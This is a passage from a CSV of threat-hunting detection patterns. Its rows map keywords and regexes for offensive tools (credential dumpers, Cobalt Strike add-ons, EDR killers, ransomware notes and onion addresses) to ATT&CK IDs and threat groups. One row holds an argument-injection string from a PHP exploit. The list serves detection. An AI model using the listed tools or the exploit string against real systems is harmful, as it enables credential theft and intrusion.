Access","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","5","10","5967","1032","2024-12-19T21:36:56Z","2018-03-10T17:11:11Z","33763" "*aix2john.pl*",".{0,1000}aix2john\.pl.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33764" "*aix2john.py*",".{0,1000}aix2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","33765" "*ajm4n/DLLHound*",".{0,1000}ajm4n\/DLLHound.{0,1000}","offensive_tool_keyword","DLLHound","Find potential DLL Sideloads on your windows computer","T1574.001 - T1574.002","TA0004 - 
TA0007","N/A","N/A","Discovery","https://github.com/ajm4n/DLLHound","1","1","N/A","N/A","7","3","201","22","2025-01-12T02:28:22Z","2024-12-20T02:26:16Z","33766" "*ajpc500/BOFs*",".{0,1000}ajpc500\/BOFs.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/ajpc500/BOFs","1","1","N/A","N/A","10","10","583","114","2022-11-01T14:51:07Z","2020-12-19T11:21:40Z","33767" "*Aka : x0xr00t*",".{0,1000}Aka\s\s\s\s\:\sx0xr00t.{0,1000}","offensive_tool_keyword","bypassUAC","UAC bypass for x64 Windows 7 - 11","T1088 - T1202 - T1112 - T1059 - 
T1548.002","TA0005 - TA0004","N/A","Dispossessor","Defense Evasion","https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC","1","0","#content","N/A","9","9","802","156","2022-07-27T15:48:45Z","2022-07-14T02:37:50Z","33768" "*akamai/DDSpoof*",".{0,1000}akamai\/DDSpoof.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","33769" "*akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad.onion*",".{0,1000}akiral2iz6a7qgd3ayp3l6yub7xx2uep76idk3u2kollpj5z3z636bad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33771" "*akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id.onion*",".{0,1000}akiralkzxzq2dsrzsrvbr2xgbbu2wgsmxryd4csgfameg52n7efvr2id\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33772" "*akkuman/rotateproxy*",".{0,1000}akkuman\/rotateproxy.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","1","N/A","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","33774" 
"*akoofbljmjeodfmdpjndmmnifglppjdi*",".{0,1000}akoofbljmjeodfmdpjndmmnifglppjdi.{0,1000}","offensive_tool_keyword","webtrufflehog","Browser extension that leverages TruffleHog to scan web traffic in real-time for exposed secrets","T1552.001 - T1040 - T1036 - T1087","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/c3l3si4n/webtrufflehog","1","0","#browser_extensionid","https://github.com/mthcht/awesome-lists/blob/41d3934b5b76aaf7555d980197d1e8b5c55f1fb3/Lists/Browser%20Extensions/browser_extensions_list.csv#L2","7","2","102","10","2024-12-29T23:26:35Z","2024-12-28T19:53:09Z","33775" "*akuafif/hXOR-Packer*",".{0,1000}akuafif\/hXOR\-Packer.{0,1000}","offensive_tool_keyword","hXOR-Packer","hXOR Packer is a PE (Portable Executable) packer with Huffman Compression and Xor encryption.","T1027 - T1048.003 - T1140 - T1205.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/akuafif/hXOR-Packer","1","1","N/A","N/A","9","1","57","14","2021-09-11T13:00:34Z","2020-11-19T14:57:03Z","33776" "*AlanFramework.git*",".{0,1000}AlanFramework\.git.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","33777" "*Albertino RAT v2.2/*",".{0,1000}Albertino\sRAT\sv2\.2\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33778" 
"*Alcatraz.sln*",".{0,1000}Alcatraz\.sln.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33779" "*Alcatraz.vcxproj*",".{0,1000}Alcatraz\.vcxproj.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33780" "*Alcatraz/obfuscator*",".{0,1000}Alcatraz\/obfuscator.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33781" "*Alcatraz-master.zip*",".{0,1000}Alcatraz\-master\.zip.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","N/A","10","10","1808","267","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z","33782" "*AlessandroZ/BeRoot*",".{0,1000}AlessandroZ\/BeRoot.{0,1000}","offensive_tool_keyword","BeRoot","BeRoot Project is a post exploitation tool to check common misconfigurations to find a way to escalate our privilege.","T1068 - T1055 - T1078 - T1548 - T1003","TA0004","N/A","N/A","Exploitation tool","https://github.com/AlessandroZ/BeRoot","1","1","N/A","N/A","10","10","2523","459","2024-10-04T11:54:01Z","2017-04-14T12:47:31Z","33783" "*AlessandroZ/LaZagne*",".{0,1000}AlessandroZ\/LaZagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. 
Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","33784" "*Alexander Hagenah (@xaitax)*",".{0,1000}Alexander\sHagenah\s\(\@xaitax\).{0,1000}","offensive_tool_keyword","Chrome-App-Bound-Encryption-Decryption","Tool to decrypt App-Bound encrypted keys in Chrome using the IElevator COM interface with path validation and encryption protections","T1003 - T1081 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/xaitax/Chrome-App-Bound-Encryption-Decryption","1","0","#content","N/A","9","5","401","73","2025-04-22T08:30:00Z","2024-10-27T11:28:35Z","33785" "*alexa-top-20000-sites.txt*",".{0,1000}alexa\-top\-20000\-sites\.txt.{0,1000}","offensive_tool_keyword","lyncsmash","a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","N/A","N/A","8","4","337","63","2024-10-01T11:22:01Z","2016-05-20T04:32:41Z","33786" "*AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits*",".{0,1000}AlexisAhmed\/CVE\-2022\-0847\-DirtyPipe\-Exploits.{0,1000}","offensive_tool_keyword","POC","exploit the Linux Dirty Pipe vulnerability","T1068 - T1078.003 - T1071.004 - T1072 - T1105","TA0004 - TA0006?","N/A","N/A","Privilege 
Escalation","https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits","1","1","#linux","N/A","10","6","595","148","2023-05-20T05:55:45Z","2022-03-12T20:57:24Z","33787" "*alex-sector/dns2tcp*",".{0,1000}alex\-sector\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","1","N/A","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","33788" "*Ali-DaNGer File Registerator*",".{0,1000}Ali\-DaNGer\sFile\sRegisterator.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33789" "*Ali-DaNGer File Registerator.exe*",".{0,1000}Ali\-DaNGer\sFile\sRegisterator\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","33790" "*al-khaser*",".{0,1000}al\-khaser.{0,1000}","offensive_tool_keyword","al-khaser","al-khaser is a PoC malware application with good intentions that aims to stress your anti-malware system. 
It performs a bunch of common malware tricks with the goal of seeing if you stay under the radar","T1055 - T1117 - T1218 - T1003 - T1552","TA0002 - TA0008 - TA0006","N/A","N/A","Exploitation tool","https://github.com/LordNoteworthy/al-khaser","1","0","N/A","N/A","N/A","10","6275","1199","2025-04-21T19:59:55Z","2015-11-12T18:35:16Z","33791" "*---All Azure AD User Principal Names---*",".{0,1000}\-\-\-All\sAzure\sAD\sUser\sPrincipal\sNames\-\-\-.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","#content","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","33792" "*All Done! Hack the planet!*",".{0,1000}All\sDone!\sHack\sthe\splanet!.{0,1000}","offensive_tool_keyword","doucme","leverages the NetUserAdd Win32 API to create a new computer account","T1136 - T1098 - T1078","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Ben0xA/DoUCMe","1","0","N/A","N/A","9","1","69","18","2021-05-01T03:15:59Z","2021-04-29T15:41:28Z","33793" "*All Dump files will be stored in C:\\Users\\Public*",".{0,1000}All\sDump\sfiles\swill\sbe\sstored\sin\sC\:\\\\Users\\\\Public.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","33794" "*All EDR drivers were successfully removed from Kernel callbacks!*",".{0,1000}All\sEDR\sdrivers\swere\ssuccessfully\sremoved\sfrom\sKernel\scallbacks!.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - 
T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","33795" "*All files on each host have been encrypted with a strong algorithm.*",".{0,1000}All\sfiles\son\seach\shost\shave\sbeen\sencrypted\swith\sa\sstrong\salgorithm\..{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source ransomware Encryfer in rust","T1486 - T1489 - T1485","TA0040 - TA0043 - TA0042","N/A","N/A","Ransomware","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","33796" "*All good in the hood. Check Temp for test.txt*",".{0,1000}All\sgood\sin\sthe\shood\.\sCheck\sTemp\sfor\stest\.txt.{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","33797" "*All Your Important Files Have Been Encrypted*",".{0,1000}All\sYour\s\Important\sFiles\<\/span\>\sHave\sBeen\sEncrypted.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33798" "*All your important files (documents, photos, videos, databases, and other files) have been encrypted using a strong encryption algorithm. 
You are unable to access these files as they have been transformed into unreadable content*",".{0,1000}All\syour\simportant\sfiles\s\(documents,\sphotos,\svideos,\sdatabases,\sand\sother\sfiles\)\shave\sbeen\sencrypted\susing\sa\sstrong\sencryption\salgorithm\.\sYou\sare\sunable\sto\saccess\sthese\sfiles\sas\sthey\shave\sbeen\stransformed\sinto\sunreadable\scontent.{0,1000}","offensive_tool_keyword","hidden-tear","open source ransomware - many variant in the wild","T1486 - T1059 - T1485 - T1489 - T1070 - T1488","TA0005 - TA0009 - TA0040 - TA0042","N/A","N/A","Ransomware","https://github.com/goliate/hidden-tear","1","0","N/A","N/A","10","8","765","394","2020-07-08T22:34:01Z","2015-08-19T09:06:51Z","33799" "*All Your Important Files Have Been Encrypted*",".{0,1000}All\sYour\sImportant\sFiles\sHave\sBeen\sEncrypted.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","33800" "*All_SubdomainTOP_Seclist.txt*",".{0,1000}All_SubdomainTOP_Seclist\.txt.{0,1000}","offensive_tool_keyword","Sudomy","Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting","T1595 - T1046","TA0002","N/A","N/A","Reconnaissance","https://github.com/screetsec/Sudomy","1","1","#linux","N/A","N/A","10","2139","396","2024-06-27T10:07:42Z","2019-07-26T10:26:34Z","33801" "*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","cobaltstrike","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P 
- Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Defense Evasion","https://github.com/0xEr3bus/PoolPartyBof","1","0","N/A","N/A","9","4","380","44","2023-12-21T19:00:20Z","2023-12-11T19:28:20Z","33802" "*Allocated shellcode memory in the target process: *",".{0,1000}Allocated\sshellcode\smemory\sin\sthe\starget\sprocess\:\s.{0,1000}","offensive_tool_keyword","PoolParty","A set of fully-undetectable process injection techniques abusing Windows Thread Pools","T1055","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/SafeBreach-Labs/PoolParty","1","0","#content","N/A","9","10","1088","143","2023-12-11T10:52:05Z","2023-05-21T16:13:32Z","33803" "*Allow Multiple RDP (Remote Desktop) Sessions By Patching termsrv.dll File*",".{0,1000}Allow\sMultiple\sRDP\s\(Remote\sDesktop\)\sSessions\sBy\sPatching\stermsrv\.dll\sFile.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file","T1112 - T1055 - T1562.001","TA0003 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","9","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","33804" "*allow_url_include%3d1+-d+auto_prepend_file%3dphp://input*",".{0,1000}allow_url_include\%3d1\+\-d\+auto_prepend_file\%3dphp\:\/\/input.{0,1000}","offensive_tool_keyword","POC","CVE-2024-4577 POC exploitation","T1190 - T1059.003","TA0001 - TA0002 - 
TA0005","N/A","N/A","Exploitation tool","https://github.com/watchtowrlabs/CVE-2024-4577","1","1","N/A","N/A","10","3","275","62","2024-06-22T15:13:52Z","2024-06-07T09:52:54Z","33805" "*AllowDelegationUsers.txt*",".{0,1000}AllowDelegationUsers\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","33806" "*AllowDelegationUsers_samaccountnames_only.txt*",".{0,1000}AllowDelegationUsers_samaccountnames_only\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","33807" "*almandin/krbjack*",".{0,1000}almandin\/krbjack.{0,1000}","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","1","N/A","N/A","10","2","113","21","2025-01-22T18:12:00Z","2023-04-16T10:44:55Z","33809" "*AlmondOffSec/PassTheCert*",".{0,1000}AlmondOffSec\/PassTheCert.{0,1000}","offensive_tool_keyword","PassTheCert","tool to authenticate to an LDAP/S server with a certificate through Schannel","T1557 - T1071 - T1021 - T1213 - T1649","TA0006 - TA0008 - TA0009","N/A","Black Basta","Lateral Movement","https://github.com/AlmondOffSec/PassTheCert","1","1","N/A","N/A","10","7","618","76","2024-07-08T22:37:30Z","2022-04-29T09:08:32Z","33810" 
"*ALPC-TaskSched-LPE*",".{0,1000}ALPC\-TaskSched\-LPE.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33811" "*ALPC-TaskSched-LPE.*",".{0,1000}ALPC\-TaskSched\-LPE\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","33812" "*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth 
- Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","N/A","10","10","286","63","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z","33813" "*Alphabug_CS*",".{0,1000}Alphabug_CS.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - 
